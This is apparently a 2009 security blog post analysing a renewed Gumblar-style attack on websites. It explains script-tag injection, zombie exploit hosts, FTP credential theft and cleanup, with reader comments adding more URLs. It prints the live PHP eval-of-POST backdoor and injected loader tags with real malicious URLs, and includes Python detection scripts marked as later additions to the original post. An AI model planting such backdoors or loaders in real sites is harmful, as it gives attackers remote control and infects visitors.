
Revenge of Gumblar Zombies

   23 Oct 09   Filed in Website exploits

Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to get rid of completely. It infected various types of files and created backdoor scripts in inconspicuous places on websites so that hackers could easily restore the malicious content.

The gumblar .cn site (and its immediate successor martuz .cn) was promptly shut down. As a result, the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find a way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.

  • Stolen FTP credentials are used to inject malicious content into existing files.
  • Malicious scripts are injected into both HTML code of web pages and into standalone .js files.
  • Backdoor scripts are uploaded to image directories. They have the same names, “gifimg.php” and “image.php”, and the rest of the PHP code is almost the same as it was during the Gumblar stage of the attack.

However, this new modification of the attack has many distinctive features that make it more resilient.

Injected Malicious Scripts

Instead of the infamous obfuscated script, this time hackers inject a tag that loads an external script (I use one script URL here as an example; there are many others).

<script src=http://melodicsongs .com/ autosuggest/bollywoodthisweek.php ></script>

This script can be usually found right before the <body> tag.

Such an external script is less suspicious than a long unreadable script used by Gumblar.

The same script is injected at the bottom of JavaScript files (.js).

document.write('<script src=http://melodicsongs .com/ autosuggest/bollywoodthisweek.php ><\/script>');

Webmasters usually search for malicious code in HTML files only and forget about .js files since their content is not visible when they use the “View Page Source” command in web browsers.

On some sites, I noticed that hackers intentionally uploaded pre-infected popular scripts (builder.js, effects.js, lightbox.js, prototype.js, scriptaculous.js) and included those .js files in infected web pages. Some webmasters don’t know their sites’ architecture well enough to spot alien scripts, especially when they have such benign names.

Pool of malicious hosts

On different compromised sites this script tag loads the malicious content from different hosts. I currently have a list of 750+ URLs of malicious scripts located on different servers all around the world (the list had 60+ entries when this post was first published and has been updated several times since).

Moreover, hackers regularly update the injected code, and the script tag on the same site may contain different src values on different days. This makes detection more difficult for anyone who scans files for a specific malicious URL.

Another interesting side effect of using multiple malicious servers is that the attack draws less attention from security specialists, since every new URL may be considered an independent case (by the way, each URL serves slightly different exploit files).

In case of Gumblar, every hacked site pointed to gumblar .cn. Anti-virus alerts mentioned only gumblar .cn. Security companies had impressive statistics for sites infected with the Gumblar script (60,000 to 200,000 sites). People talked only about Gumblar. Press talked about Gumblar. As a result of this enormous publicity the gumblar .cn domain name had been quickly shut down (the same happened to martuz .cn), which effectively stopped the attack. A single source of the malicious content was the weakest link of Gumblar, its single point of failure.

Now that different hacked sites point to different malicious locations, there is no solid stream of information about the attack. The infection statistics for each URL are not that impressive. Each malicious URL can be found on a relatively small number of sites (100 – 2,000) – not enough to talk about an epidemic. This helps hackers stay under the radar even in the active phase of the attack. Being less prominent means that security companies spend less time fighting the threat. Nonetheless, the overall effect of this attack may be comparable to Gumblar. At this point I have detected over 6,000 unique compromised sites (5,000 when this post was first published), and I don’t think my list is complete.

On the other hand, everyone talks about different URLs, and it’s hard to find a common denominator and see the whole picture. Trying to resolve the same issue, webmasters of different sites search for information about different malicious URLs. As a result, they can’t find a single source of information and miss useful posts that don’t mention the particular URL found on their own sites. This makes it harder for webmasters to find relevant information and effectively clean up their sites, and the infection time frame increases.

I’ll try to compile all information about this attack here, posting all known malicious URLs so that webmasters of affected sites could find this article regardless of the script modification found on their sites.

Here is a small part of the list. The full list, which contains 700+ URLs of Gumblar zombies, has moved to this page.

  1. sarathyplastics .com/ images/gifimg.php
  2. dailylaiken .com/ Image/Index.php
  3. durbin .no/ cv/prices.php
  4. testpagina2.webdesign-idej .nl/ pdf-bestand/nl-home-power.php
  5. quiksilver .dk/ 2009products/shops.php
  6. newcastledistrictcleaning .co.uk/ images/gifimg.php
  7. itillc .com/ DISK1/contactSubmit.php
  8. smtech .in/ board_inc/img2/f7e7/imgInsertImageAlignType_newline.php
  9. download-reactor .com/ SatelliteTV/quicktimepic.php
  10. mesaimeerclub .com/ images/qm19.php
  11. pannatex .com/ test/s20.php
  12. …..

This list is not complete. I’ll try to update it when I find new malicious URLs.

At this point note the distinctive feature of these URLs: they all refer to a PHP script in a sub-directory of a third-party site.

Finding code that links to websites you don’t know anything about should be suspicious in itself, but if you find an external script with a source resembling one of the above URLs, make sure to read the rest of this post.

Zombie websites.

The malicious scripts reside on hacked legitimate websites. This is probably the most innovative feature of this incarnation of the attack. You can’t just shut down the sites or domain names since they belong to legitimate resources. Of course, the sites can be blacklisted (say, by Google), but at this point less than 20% of them are listed as suspicious (mainly because of other, older problems).

I had never seen hackers placing exploit files directly on hacked websites before. Legitimate websites were only used to silently redirect visitors to sites that belonged to criminals. Sometimes hackers create spammy pages on legitimate websites (either for SEO purposes or to have a cheap non-blacklisted location to link to from their spam emails). But I don’t remember them serving exploits directly from hacked files. The main reason is probably that this sort of activity can be easily detected by owners of compromised sites: traces in logs, significantly increased bandwidth usage, etc. Injected scripts and iframes are more convenient for them: the exploit traffic goes to the criminals’ own servers, so it leaves no traces in the compromised site’s access logs and doesn’t affect its bandwidth usage.

So why do they use compromised sites now? Aren’t they afraid of being unmasked? I guess they aren’t. And here’s why:

  • After the Gumblar attack they tracked infected sites for a few months and noticed that many site owners didn’t even try to remove the malicious content. Some of the sites might have been abandoned (but their hosting and domain names are prepaid, and they may exist in such an unattended state for a long time); other sites are simply poorly maintained by ignorant webmasters who don’t have the slightest idea about security threats. Now hackers have a pool of sites that they can use without much risk of being quickly unmasked by site owners.
  • At the same time, their new distributed model (using multiple sources of the malicious content at the same time) significantly reduces resource usage on each individual site. Even sites on shared hosting plans can handle the load.
  • And they don’t care if some of their zombie sites get shut down – they have many more zombies at their disposal. With their botnets of zombie clients, they can quickly update the malicious code on compromised sites to refer to a new zombie host.

Very convenient, isn’t it? Hackers no longer have to worry about abuse-proof servers and bandwidth. No need to register hundreds of domain names that become blacklisted very soon. It’s all disposable by nature, so why not have it for free at the expense of webmasters who don’t look after their sites?

All they need is software that can correctly manage this cloud of zombie sites. And it looks like they have it now and we’ll see more attacks that use zombie sites in the future.

Malware

The malicious code on zombie sites is generated on the fly. Every time you reload the PHP page you get a differently obfuscated copy of the same JavaScript. This may prevent detection of the script by AV tools that rely solely on exact matches or checksums.

The malicious code depends on the version of your web browser and your operating system. You get different code for IE6, IE7 and Firefox (I didn’t test other browsers). And if you are on Linux you simply get a 404 Not Found error. This way hackers try to exploit known vulnerabilities on visitors’ computers.

For example, in all versions of the script they try to load a malicious PDF file if they detect that the “PDF.PdfCtrl” or “AcroPDF.PDF” (Adobe Reader or Adobe Acrobat) plugin is installed and the product version is older than 9.0 but not 8.1.3 (the current version is 9.2.0).

Another universal exploit is a Flash file for the “ShockwaveFlash.ShockwaveFlash.9” (Shockwave Flash) plugin if its version is older than 9.124 (the current version is 10.0.32.18). As you can see, the malware targets pretty old vulnerabilities that were fixed about a year ago. I wonder how many web surfers didn’t bother to upgrade the plugins? It looks like many.

Each zombie site serves slightly modified binaries of the exploits. A week ago the files easily passed the VirusTotal check undetected. Today I checked the same files and the PDF was detected as malicious by 5 out of 41 AV tools and the SWF files were detected by 4 out of 41 AV tools.

In case of IE7, hackers also try to exploit vulnerabilities in “OWC10.Spreadsheet“/”OWC11.Spreadsheet” plugins. It’s Office Web Components. In other words, MS Excel working inside Internet Explorer.

For IE6, they try a VBScript that simply writes a trojan .exe into the Startup folder of the Windows Programs menu. (Do you still use IE6?)

Not only do hackers target different browsers, they also target different countries. On each zombie server I found a binary file of the latest (Oct 1, 2009) MaxMind GeoLite Country database.

Backdoor scripts

Backdoor scripts are almost identical to those used during the Gumblar stage of the attack.

Scripts with filename “image.php” and “gifimg.php” can be found in images directories of compromised sites.

<?php e val(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

When deobfuscated, the code reads like

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

This script executes any PHP code that hackers pass via an HTTP POST request. Hackers like POST requests because, unlike GET requests, they don’t leave the passed parameters in web server logs: a standard access log records the method, the requested path, the status code and the response size, but never the POST body, so the PHP code actually sent to the backdoor is invisible there. The request itself is still logged, though, so a POST to a PHP file in an images directory is something you can look for.
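The check described above, as an added example that is not part of the original post: a small parser for combined-format access logs that flags POST requests to PHP scripts living in directories that should only hold static files, or carrying one of the backdoor names reported here. The log lines are constructed for this example, and the list of static-only directory names is an assumption.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format. The request body (where the PHP payload travels)
# is never logged; method, path, status and response size are.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumptions for this example: the two backdoor names reported in this post, and
# directory names that normally hold static files only, so a PHP script there is suspicious.
BACKDOOR_NAMES = {"gifimg.php", "image.php"}
STATIC_DIRS = {"images", "image", "img", "pics", "css", "js"}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict; None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def looks_like_backdoor_call(entry: Dict[str, str]) -> bool:
    """POST to a .php file that has a known backdoor name or sits in a static-only directory.
    Status is deliberately ignored: die('404 Not Found') prints that text but PHP still
    answers 200, so the backdoor's own replies look like successful requests."""
    if entry["method"].upper() != "POST":
        return False
    path = entry["path"].split("?", 1)[0]
    parts = [p for p in path.split("/") if p]
    if not parts or not parts[-1].lower().endswith(".php"):
        return False
    dirs = {p.lower() for p in parts[:-1]}
    return parts[-1].lower() in BACKDOOR_NAMES or bool(dirs & STATIC_DIRS)


def find_backdoor_posts(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed entries that match, in log order. Unparseable lines are skipped."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and looks_like_backdoor_call(entry):
            hits.append(entry)
    return hits


# Constructed sample log (not from a real server): two backdoor calls among ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Oct/2009:04:12:07 +0000] "POST /images/gifimg.php HTTP/1.1" 200 13 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [23/Oct/2009:04:12:09 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Oct/2009:04:13:30 +0000] "POST /Image/Index.php HTTP/1.1" 200 13 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [23/Oct/2009:04:14:00 +0000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.com/contact.php" "Mozilla/5.0"',
    '192.0.2.9 - - [23/Oct/2009:04:14:10 +0000] "GET /images/logo.gif HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in find_backdoor_posts(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["path"], hit["status"], hit["size"])
```

Run it over a real log with find_backdoor_posts(open(path).readlines()). The 13-byte responses in the sample are the length of the text “404 Not Found”; a genuinely missing file would come back with status 404 and the server’s own error page. Note that the upload of the backdoor file itself goes through FTP and shows up in the FTP log, not here; the access log only shows the backdoor being used.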

In image.php, the code also echoes some predefined string like “36392b39332e3134342e33343a726f6674616d663a4e3669693355363056376132“. Probably they use it to verify that the script is correctly uploaded and is still there.

These two are general purpose backdoor scripts that can be used for any task. There is also a more specialized script. The following code is injected at the top of some existing PHP files.

<?php eval(base64_decode('aWYoIWlzc2V0KCRueW5oeTEpKXtmdW5jd ... J10pKTs=')); ?>

In this script the base64-encoded string is much longer than in gifimg.php files (I shorten it here to make the code snippet more readable).

This script executes PHP code passed as a POST parameter too, so it can potentially be used for any task. But it also defines one interesting function that injects malicious script tags into web pages. The script tags are injected either before the <body> tag, or at the very bottom of files if they contain the substring ‘,a (a strange condition, isn’t it?). Before injecting the new tags, this script tries to remove the malicious code of previous attacks (it tries to remove hidden iframes and certain types of scripts).

Error Pages

On some servers 404 (page not found) and 403 (forbidden) error pages were also infected with malicious script tags.

Stolen FTP credentials

Like Gumblar, this attack also uses stolen FTP credentials. This fact was confirmed by the security departments of web hosting providers who inspected FTP logs.

Back in May, Gumblar behavior was tested on an intentionally infected Windows computer. The test proved that malware steals passwords saved in FTP programs (FileZilla in that case).

It was also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from the configuration files of 10 popular FTP clients. The fact that the Gumblar backdoor scripts try to remove hidden iframes from HTML files before injecting malicious script tags also suggests some relationship between them. This makes me think that either these two types of hacker attacks are run by the same people, or they share the same database of stolen FTP credentials. They may also use the same password-stealing trojans.

Detection

Warning: Loading websites in a web browser with enabled JavaScript may be dangerous.

It’s a good idea to use something like NoScript that only allows script execution from trusted domains. This way, if you see a warning that some scripts have been blocked on your site, you can be sure that something’s wrong and you should scan the files on your server for suspicious scripts.

You can also use Unmask Parasites. However, since most of the zombie sites are still not blacklisted by Google, you won’t see warnings. Nonetheless, the malicious scripts will be listed in the External References section and you should be able to spot unknown domain names.

To detect this infection, scan every file on the server for script tags that point to strange PHP scripts located in subdirectories of unfamiliar third-party sites. They can usually be found right before the <body> tag. As a webmaster you should know which scripts belong to your site and which don’t.

Make sure to check every .js file. The malicious code starts with “document.write(‘<script src=…” and can be usually found at the very bottom.

Then search for backdoor scripts. Scan the whole directory tree for files with names “gifimg.php” and “image.php“. They can be usually found in “images” directories.

Then search for files that contain the “eval(base64_decode(…))” construction. It is usually used to obfuscate malicious code.

Don’t forget to check custom error pages.
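The detection steps above, and the injected tags described in the “Injected Malicious Scripts” section, as one added example that is not part of the original post: a scanner that walks a site tree and applies the four checks (external script tags pointing to third-party .php files, document.write script injection in .js files, the known backdoor file names, and eval(base64_decode(...)) literals, which it also decodes so you can read the hidden PHP). The sample site is constructed for the example, zombie.example is a placeholder host, and the list of your own hostnames is something you supply.

```python
import base64
import os
import re
from typing import Dict, Iterable, List, Tuple
from urllib.parse import urlparse

# <script ... src=URL>; the injected tag has no quotes around the URL, so quotes are optional here.
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# eval(base64_decode('...')) with a literal blob, as in the gifimg.php backdoor quoted above.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.I)
BACKDOOR_NAMES = {"gifimg.php", "image.php"}
HTML_EXT = {".html", ".htm", ".shtml", ".php"}

Finding = Tuple[str, str, str]  # (file path, rule name, detail)


def external_php_scripts(text: str, own_hosts: Iterable[str]) -> List[str]:
    """src values of script tags that point to a .php file on a host that is not one of ours."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for src in SCRIPT_SRC_RE.findall(text):
        u = urlparse(src)
        if u.netloc and u.netloc.lower() not in own and u.path.lower().endswith(".php"):
            hits.append(src)
    return hits


def decode_eval_base64(text: str) -> List[str]:
    """Decode every eval(base64_decode('...')) literal so the hidden PHP can be read."""
    decoded = []
    for blob in EVAL_B64_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError
            decoded.append("<undecodable>")
    return decoded


def is_post_eval_backdoor(php: str) -> bool:
    """The backdoor shape from this post: eval() of something taken from $_POST."""
    return "$_POST" in php and re.search(r"\beval\s*\(", php) is not None


def scan_files(files: Dict[str, str], own_hosts: Iterable[str]) -> List[Finding]:
    """Apply the four checks to a {relative path: text} map and return every finding."""
    findings: List[Finding] = []
    for path, text in files.items():
        name = os.path.basename(path).lower()
        ext = os.path.splitext(name)[1]
        if name in BACKDOOR_NAMES:
            findings.append((path, "backdoor-name", name))
        if ext in HTML_EXT:
            for src in external_php_scripts(text, own_hosts):
                findings.append((path, "external-php-script", src))
        if ext == ".js" and "document.write(" in text:
            for src in external_php_scripts(text, own_hosts):
                findings.append((path, "js-document-write", src))
        for php in decode_eval_base64(text):
            rule = "eval-base64-post-backdoor" if is_post_eval_backdoor(php) else "eval-base64"
            findings.append((path, rule, php[:60]))
    return findings


def scan_tree(root: str, own_hosts: Iterable[str]) -> List[Finding]:
    """Read every file under root (custom error pages included) and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for fn in names:
            full = os.path.join(dirpath, fn)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return scan_files(files, own_hosts)


# Constructed sample site (not a real capture). The blob is the gifimg.php payload quoted above.
GIFIMG_BLOB = ("aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2Ug"
               "ZGllKCc0MDQgTm90IEZvdW5kJyk7")
SAMPLE_SITE = {
    "index.html": "<html><head><title>Home</title></head>\n"
                  "<script src=http://zombie.example/autosuggest/news.php ></script><body>Hi</body></html>\n",
    "js/effects.js": "function fx(){}\n"
                     "document.write('<script src=http://zombie.example/autosuggest/news.php ><\\/script>');\n",
    "js/app.js": "var ok = true;\n",
    "images/gifimg.php": "<?php eval(base64_decode('" + GIFIMG_BLOB + "'));?>\n",
    "404.html": "<html><body><script src=\"/js/app.js\"></script>Not found</body></html>\n",
}

if __name__ == "__main__":
    for path, rule, detail in scan_files(SAMPLE_SITE, ["www.example.com"]):
        print(f"{path}: {rule}: {detail}")
```

Use scan_tree("/path/to/docroot", ["www.yoursite.com", "yoursite.com"]) on a copy of the site downloaded over FTP. The “eval-base64” rule without the POST part also fires on some legitimate (and on obfuscated commercial) code, so read the decoded text before deleting; the “eval-base64-post-backdoor” rule is the one that matches the gifimg.php / image.php backdoors exactly.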

Removal Instructions

  1. Start with your own computer (this is mainly for Windows users).
    1. Scan it for viruses and spyware. Use at least two different AV and anti-spyware tools. (Back in May, MalwareBytes was reported to be able to detect the malware)
    2. Once your computer is clean, make sure your software is up to date (this step helps prevent reinfection of your PC):
      1. Update Windows (This October Microsoft has released security fixes for many critical vulnerabilities)
      2. Use a modern web browser (I suggest Firefox 3.5 with the NoScript extension). If you use IE6 – upgrade ASAP!
      3. Upgrade Flash and Adobe Reader – this attack uses vulnerabilities in older versions these plugins. (As of Oct 23, 2009 the current versions of these plugins should be: Flash: 10.0.32.18; Adobe Acrobat/Reader: 9.2.0)
  2. Change all site passwords. Don’t save the new passwords in your FTP clients if you don’t want them to be stolen again. Consider using secure protocols (SFTP or FTPS) instead of FTP.
  3. Clean up the site. This hacker attack modifies a lot of files and creates backdoor scripts in inconspicuous locations so it would be very difficult to manually remove malicious content from every infected file. And if you fail to remove even one backdoor script, the risk of reinfection will be high.
    The easiest way is to remove every file on your site and upload a clean copy from a backup (make sure the backup is not infected). Don’t forget about configuration files and custom error pages.
  4. Don’t forget to regularly check your site for security issues.
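Step 3 above relies on having a clean backup. As an added example that is not part of the original post, here is a way to compare that backup against the live site file by file before restoring: anything that exists only on the live site is a candidate backdoor, anything whose contents differ is a candidate injection, and the list tells you exactly which files (including .htaccess and custom error pages) the attackers touched. The two trees are constructed for the example; the static-only directory names used to rank additions are an assumption.

```python
import hashlib
import os
from typing import Dict, List

Manifest = Dict[str, str]  # relative path -> SHA-256 hex digest

# Assumption for this example: directories that should contain no PHP at all.
STATIC_DIRS = {"images", "image", "img", "pics", "css", "js"}


def manifest_of_files(files: Dict[str, bytes]) -> Manifest:
    """Manifest of an in-memory {path: bytes} map (used for the constructed sample below)."""
    return {p: hashlib.sha256(b).hexdigest() for p, b in files.items()}


def manifest_of_tree(root: str) -> Manifest:
    """Manifest of every regular file under root, keyed by forward-slash relative path."""
    out: Manifest = {}
    for dirpath, _, names in os.walk(root):
        for fn in names:
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            out[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return out


def compare_manifests(clean: Manifest, live: Manifest) -> Dict[str, List[str]]:
    """added: only on the live site (new backdoors); modified: content differs (injections);
    missing: in the backup but gone from the site."""
    return {
        "added": sorted(p for p in live if p not in clean),
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "missing": sorted(p for p in clean if p not in live),
    }


def suspicious_additions(added: List[str]) -> List[str]:
    """Added PHP files inside static-only directories: the gifimg.php / image.php pattern."""
    out = []
    for p in added:
        parts = p.lower().split("/")
        if parts[-1].endswith(".php") and set(parts[:-1]) & STATIC_DIRS:
            out.append(p)
    return out


# Constructed sample (not a real site): the backup, and the same site after the infection.
SAMPLE_CLEAN = {
    "index.html": b"<html><body>Hello</body></html>\n",
    "js/effects.js": b"function fx(){}\n",
    "images/logo.gif": b"GIF89a",
    ".htaccess": b"ErrorDocument 404 /404.html\n",
    "404.html": b"<html><body>Not found</body></html>\n",
}
SAMPLE_LIVE = dict(SAMPLE_CLEAN)
SAMPLE_LIVE["js/effects.js"] = (b"function fx(){}\n"
                                b"document.write('<script src=http://zombie.example/a/b.php ><\\/script>');\n")
SAMPLE_LIVE["404.html"] = b"<html><script src=http://zombie.example/a/b.php ></script><body>Not found</body></html>\n"
SAMPLE_LIVE["images/gifimg.php"] = b"<?php /* backdoor placeholder */ ?>\n"

if __name__ == "__main__":
    report = compare_manifests(manifest_of_files(SAMPLE_CLEAN), manifest_of_files(SAMPLE_LIVE))
    for kind, paths in report.items():
        print(kind, paths)
    print("suspicious", suspicious_additions(report["added"]))
```

On a real site, use compare_manifests(manifest_of_tree("backup/"), manifest_of_tree("live_copy/")). The comparison is only as good as the backup: if the backup was taken after the site was first compromised, the backdoors are in both trees and show up as neither added nor modified, which is exactly why the instructions say to make sure the backup itself is clean.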

Credits

I’d like to thank Michael Karr (HostGator) and Patrick Webster (phpBB.com Support Team) for sending me samples of malicious PHP code and some useful information that I wouldn’t be able to get without internal access to compromised websites. Thank you! Your help was indispensable!

Care to comment?

It looks like we have a lot of information about this attack. However I still have many questions. What is the real relationship between Gumblar and the iframe-injection attack? What PHP code is passed to the backdoor scripts? I’d like to see the PHP code of the scripts on the zombie sites (server admins: check if any of them is hosted on your servers). Any additional information is welcome.

Found any inaccuracy or errors in my article? Have a question? Or just want to share your experience? Please leave your comments below or contact me directly.

Similar posts:

  1. Gumblar .cn Exploit – 12 Facts About This Injected Script
  2. List of Gumblar Zombie URLs
  3. Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?
  4. Hidden CN Iframes Are Still Prevalent
  5. 10 FTP Clients Malware Steals Credentials From
  6. All reviewed website exploits

Reader's Comments (50)

  1. |

    [...] 20, 2009 ))- Gumblar… Not Gumby! ( FireEye Malware Intelligence Lab ( October 23, 2009 ))- Revenge of Gumblar Zombies ( Unmask Parasites Blog ( October 23, 2009 [...]

  2. |

    Absolutely an awesome writeup on the evolution of this malicious trend. All details are spot on here from what I have seen coming in from compromised websites. It looks like we haven’t seen the last of Gumblar, and maybe we should also really pay attention to the evolution of this for the future.

    Further steps to prevent the infection of Gumblar/Martuz/nine-ball.
    http://blog.igothacked.com/2009/06/steps-to-prevent-gumblar-martuz-nine.html

  3. |

    [...] Revenge of Gumblar Zombies Gumblar… Not Gumby! [...]

  4. |

    Thanks for the great write-up.
    About one or two weeks ago when I installed AVG (latest at that time), AVG promptly detected JS downloaders as a virus and also alerted with ‘no entry’ on sites containing those script insertions.

    Today I had to format my drive, after that I again installed AVG ( latest as available today), all options enabled, but AVG no longer detects those even in files where I explicitly copy and paste those codes.

    Wondering what’s wrong??

  5. |

    Thanks much for the good post!

  6. |

    [...] This post was mentioned on Twitter by larusalka, Gumblar and Lily Kermit, James Lester. James Lester said: RT @unmaskparasites: [blog] Revenge of Gumblar Zombies http://bit.ly/3VVVLW – analysis of the new incarnation of the Gumblar attack [...]

  7. |

    I’m seeing a lot of websites with this code injected in their pages, but our AV company is not seeing the malicious payload, and I’ve been unable to get decent samples to provide them for further analysis. One sample I got appeared to be corrupted or incomplete.

    How did you obtain the samples to scan with VirusTotal? I’ve been trying to get samples with an unpatched computer, but so far no dice.

    • |

      I’ve deobfuscated their scripts, retrieved the URLs of the exploits and then downloaded the binaries. Of course User Agents and referrers are important since they save session information, and if they detect something fishy they stop serving the malicious content.

      I can send you samples of PDF and SWF files I have.

      • |

        Yes, I’d appreciate the samples. Not sure the best (safest) way for you to get them to me.

        It turns out my AV is now detecting the file I submitted as Bloodhound.PDF.17 (three guesses who I’m using for AV), but I’m not sure how much further they’ve gone into it, as far as other samples. I’d prefer not to wait until our systems are infected before protecting ourselves.

  8. |

    Hi,
    thank you for this information :)
    I have written a little program to remove all infected files from web servers.. if you like I will send you the windows program and source code to offer it here for download.
    Juergen

    • |

      Thank you everyone for all the info. I am one of the recurring victims, detecting the threat ASAP but not knowing if I completely cleaned out (changed all passwords of course).

      I’d really appreciate your program Juergen. Would it be too much to ask to send it over to remador09 at gmail.com ?

      Thank you!

    • |

      please send me the code

    • |

      Juergen, could you send me the code at juanpablo at indigomedia dot com.ar, please?

      thanks in advance,

      Juan

    • |

      Hi Juergen,
      I would appreciate if you can send me the program too. My e-mail address is gpetrov_98 {at} yahoo dot com. Thank you in advance!
      Best regards, Georgi

    • |

      Hi Juergen,

      Can you send me the program too? Many thanks, Nick temp99 [at] clarioncall Dot co Dot uk

    • |

      Hi Juergen,

      Me too please! I thought I cleaned all the .js files out, and the gifimg.php out of my images folders and it came back!!!

      My sites are hosted on Yahoo! And now I have a few sites with this malware crap…

      Your help is greatly appreciated!
      We all have work and family and this takes time to deal with. You are helping people out.
      Thanks!

      william @ designfuel.com

    • |

      Please send also your program to amin.cheng @ gmail.com Thanks.

  9. |

    Great article! I’m not a virus pro, but this article helped me clean up my client’s corporate sites. Thanks a lot.

  10. |

    Here you have some more sites detected today (extra blanks added):

    hxxp://qvevri. ge/Files/wp -rss.php

    hxxp://hast-eg. com/old/vision-contents. php?s=znBeC1ICv&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=znBeC1ICv&id=2

    hxxp://hast-eg. com/old/vision-contents.php?s=zghs1nsY&id=2

    hxxp://hast-eg. com/old/vision-contents. php?s=zghs1nsY&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=aozFXIs&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=aozFXIs&id=2

    hxxp://hast-eg. com/old/vision-contents. php?s=LdyHaxncL&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=LdyHaxncL&id=2

    Regards,
    Raúl B.

  11. |

    Here are three we found along with the gifimg.php files on our site.

    The urls below were all part of script tags being added to js files and index files primarily.

    nyota-kwa-afrika . de

    dr-mhashim . com

    premiumoriginalprints . com

    • |

      Please post whole URLs of malicious scripts. The site themselves are not malicious. They are just hacked sites. Like yours.

  12. |

    Thank you so much for such an excellent article to help me understand what happened to my site. I still don’t understand how php pages got changed to html with bad code but I do know how to clean the files now.

    This is a very, very useful post. Thank you for taking the time to explain it in such clear language.

    Here is the code I found in all my *.js files and two html files that were php in the original uninfected web:

    hxxp://spektrsec .ru/ images/log.php

  13. |

    I had 2 websites with this file gifimg.php in all the image files. It added script to every web page and changed every js file. I had a clean back up site on my computer and was able to replace all bad files, but I missed one and had to do it all over again the next day. I changed password for management of the site and disabled FTP read/write.
    I resubmitted to Google to check it out. I had 2 websites from 2 different servers that had the same files, but it wrote different scripts into each one.

    Thank you for this information on this problem, it now makes sense that all of a sudden my sites were attacked, the Boss site was attack on Nov 11, 2009, we got calls from customers about it.

  14. |

    [...] ———- Gumblar CompromiZed List: Unmask Parasites is updating its list of sites compromised by Gumblar.X; at present 245... [...]

  15. |

    Like Chris, I have also been infected with the PremiumOriginalPrints.com rogue script. It appears inside all WordPress blog posts and 4 static HTML pages on my website. I was notified of this today via Google Webmaster Tools. Here is what the script looks like:

    **End script tag.

    This has caused Google to create a “This site may harm your computer message” for all Firefox users who visit my site. There is a big red warning box labeled “Suspected Attack Site.”

    What can we do to prevent this type of thing from happening? It seems like WP is insecure.

  16. |

    Okay, let’s try the script again:

    BEGIN SCRIPT TAG src=hxxp://premiumoriginalprints .com/ libraries/CREDITS.php END SCRIPT TAG

  17. |

    Here are some other malicious sites I found sitting in my code.

    hxxp:// stylusbrindes.com .br/ css/porta_garrafa.php
    hxxp:// yoboa .com/ art/Baby_Kid.php
    hxxp:// iraqiyoon .net/ images/sag_ani.php
    hxxp:// samed-resort .com/ full/beer.php
    hxxp:// leanqcd .com/ ESW/text20.php
    hxxp:// tcvicogne .be/ includes/ledenlijst.php

  18. |

    It’s important to note that the files are not simply named gifimg.php or image.php anymore, but can be named much of anything. The best method to locate these files is to:
    find . -iname \*.php -size 141c
    If the content of these files is a simple base64_decode string inside of php tags, it’s most likely identical to the gifimg.php pages that are so prevalent.

    Best Regards

  19. |

    Here is a list of malicious sites found in my code:

    letterssite .ru:8080
    onceworld .ru:8080
    sebastiangora-photography .com/ 1ok/pluginmgr.php
    favelinha.com / styles/index.php

  20. |

    Hello; I have a problem with the page, someone injected me with a virus on the What should I do to solve the problem? Please help me

  21. |

    For us it continues. I had missed one base64 string which undid my original cleaning, but after fixing everything and being 100% sure about it, the site was hacked again. All UNs and PWs changed and at 0400 this morning, index.php files messed up and all js files new, gifimg.php file inserted. Weird thing is, the addition of the gifimg.php file doesn’t show up in access logs.

    we’re at our wits end with it. like i said, Usernames and Passwords have all been changed and replaced, distributed over the phone and within hours its all messed up again.

    • |

      >the addition of the gifimg.php file doesnt show up in access logs

      I guess, they are uploaded via FTP so they should be in FTP logs, not in access logs.

